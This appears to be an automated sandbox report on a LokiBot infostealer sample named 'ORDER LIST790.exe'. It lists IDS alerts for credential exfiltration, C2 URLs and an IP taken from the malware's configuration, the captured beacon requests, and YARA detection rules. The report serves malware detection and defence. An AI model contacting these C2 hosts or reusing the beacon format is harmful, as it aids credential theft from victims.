Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49742 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 66.29.145.162:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 66.29.145.162:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://66.29.145.162/?112233

Source: Joe Sandbox View

ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS

Source: Joe Sandbox View

IP Address: 66.29.145.162 66.29.145.162

Source: global traffic	HTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 163Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162
Source: unknown	TCP traffic detected without corresponding DNS query: 66.29.145.162

Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org
Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://centos.org
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://httpd.apache.org/
Source: ORDER LIST790.exe	String found in binary or memory: http://philiphanson.org/medius/book/1.0
Source: ORDER LIST790.exe	String found in binary or memory: http://philiphanson.org/medius/temp-transform
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ORDER LIST790.exe, 00000004.00000002.289238555.000000000356D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.centos.org/
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, ORDER LIST790.exe, 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ORDER LIST790.exe, 00000000.00000002.276751658.00000000073D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown

HTTP traffic detected: POST /?112233 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 66.29.145.162Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6B020D42Content-Length: 190Connection: close

Source: ORDER LIST790.exe, 00000000.00000002.271014354.0000000001650000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.ORDER LIST790.exe.3730b48.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.275714914.0000000004726000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.268461848.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000000.268189869.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.275655119.0000000004709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: ORDER LIST790.exe PID: 1672, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORDER LIST790.exe

Source: ORDER LIST790.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.4726268.9.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.470c248.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.0.ORDER LIST790.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.470c248.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.4726268.9.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.ORDER LIST790.exe.37298fc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.ORDER LIST790.exe.373cd94.3.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
